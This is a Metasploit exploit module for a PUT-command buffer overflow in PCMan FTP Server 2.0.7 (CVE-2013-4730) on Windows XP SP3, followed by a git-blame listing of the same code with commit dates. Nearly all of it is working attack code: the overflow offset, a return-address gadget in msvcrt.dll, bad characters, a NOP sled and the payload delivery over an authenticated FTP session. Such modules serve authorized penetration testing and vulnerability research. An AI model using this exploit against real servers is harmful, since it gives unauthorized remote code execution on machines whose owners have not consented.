modules/exploits/windows/ftp/pcman_put.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PCMAN FTP Server Buffer Overflow - PUT Command',
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability found in the PUT command of the
          PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
          credentials are enabled.
      },
      'Author'         =>
          [
            'Jay Turla',      # Initial Discovery -- @shipcod3
            'Chris Higgins'   # msf Module -- @ch1gg1ns
          ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-4730' ],
          [ 'EDB',   '37731'],
          [ 'OSVDB',   '94624']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'Space'   => 1000,
          'BadChars'  => "\x00\x0A\x0D",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP3 English',
            {
              'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll
              'Offset' => 2007
            }
          ],
        ],
      'DisclosureDate' => 'Aug 07 2015',
      'DefaultTarget'  => 0))
  end

  def post_auth?
    true
  end

  def check
    connect_login
    disconnect

    if /220 PCMan's FTP Server 2\.0/ === banner
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end


  def exploit
    connect_login

    print_status('Generating payload...')
    sploit = rand_text_alpha(target['Offset'])
    sploit << [target.ret].pack('V')
    sploit << make_nops(16)
    sploit << payload.encoded

    send_cmd( ["PUT", sploit], false )
    disconnect
  end
end
Added PCMan FTP PUT Buffer Overflow Exploit 2016-01-26 17:09:31 -06:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Added PCMan FTP PUT Buffer Overflow Exploit 2016-01-26 17:09:31 -06:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

Change class name for exploits/windows/ftp/pcman_put.rb 2016-03-31 19:36:02 -05:00			`class MetasploitModule < Msf::Exploit::Remote`
Added PCMan FTP PUT Buffer Overflow Exploit 2016-01-26 17:09:31 -06:00			`Rank = NormalRanking`

			`include Msf::Exploit::Remote::Ftp`

			`def initialize(info = {})`
			`super(update_info(info,`
Few updates per OJ and wvu 2016-01-26 23:19:18 -06:00			`'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command',`
Added PCMan FTP PUT Buffer Overflow Exploit 2016-01-26 17:09:31 -06:00			`'Description' => %q{`
			`This module exploits a buffer overflow vulnerability found in the PUT command of the`
			`PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous`
80 pages left 2017-09-13 22:03:34 -04:00			`credentials are enabled.`
Added PCMan FTP PUT Buffer Overflow Exploit 2016-01-26 17:09:31 -06:00			`},`
			`'Author' =>`
			`[`
Few updates per OJ and wvu 2016-01-26 23:19:18 -06:00			`'Jay Turla', # Initial Discovery -- @shipcod3`
			`'Chris Higgins' # msf Module -- @ch1gg1ns`
Added PCMan FTP PUT Buffer Overflow Exploit 2016-01-26 17:09:31 -06:00			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Update CVE references for exploit modules 2018-07-08 18:46:04 -05:00			`[ 'CVE', '2013-4730' ],`
Added OSVBD ID thanks to @shipcod3 2016-02-01 17:11:46 -06:00			`[ 'EDB', '37731'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '94624']`
Added PCMan FTP PUT Buffer Overflow Exploit 2016-01-26 17:09:31 -06:00			`],`
			`'DefaultOptions' =>`
			`{`
Few updates per OJ and wvu 2016-01-26 23:19:18 -06:00			`'EXITFUNC' => 'process'`
Added PCMan FTP PUT Buffer Overflow Exploit 2016-01-26 17:09:31 -06:00			`},`
			`'Payload' =>`
			`{`
			`'Space' => 1000,`
			`'BadChars' => "\x00\x0A\x0D",`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Windows XP SP3 English',`
			`{`
			`'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll`
			`'Offset' => 2007`
			`}`
			`],`
			`],`
			`'DisclosureDate' => 'Aug 07 2015',`
			`'DefaultTarget' => 0))`
			`end`

Update false negatives on post auth information 2018-08-20 16:05:58 -05:00			`def post_auth?`
			`true`
			`end`

Added PCMan FTP PUT Buffer Overflow Exploit 2016-01-26 17:09:31 -06:00			`def check`
			`connect_login`
			`disconnect`

			`if /220 PCMan's FTP Server 2\.0/ === banner`
Few updates per OJ and wvu 2016-01-26 23:19:18 -06:00			`Exploit::CheckCode::Appears`
Added PCMan FTP PUT Buffer Overflow Exploit 2016-01-26 17:09:31 -06:00			`else`
Few updates per OJ and wvu 2016-01-26 23:19:18 -06:00			`Exploit::CheckCode::Safe`
Added PCMan FTP PUT Buffer Overflow Exploit 2016-01-26 17:09:31 -06:00			`end`
			`end`


			`def exploit`
			`connect_login`

			`print_status('Generating payload...')`
			`sploit = rand_text_alpha(target['Offset'])`
			`sploit << [target.ret].pack('V')`
			`sploit << make_nops(16)`
			`sploit << payload.encoded`

			`send_cmd( ["PUT", sploit], false )`
			`disconnect`
			`end`
			`end`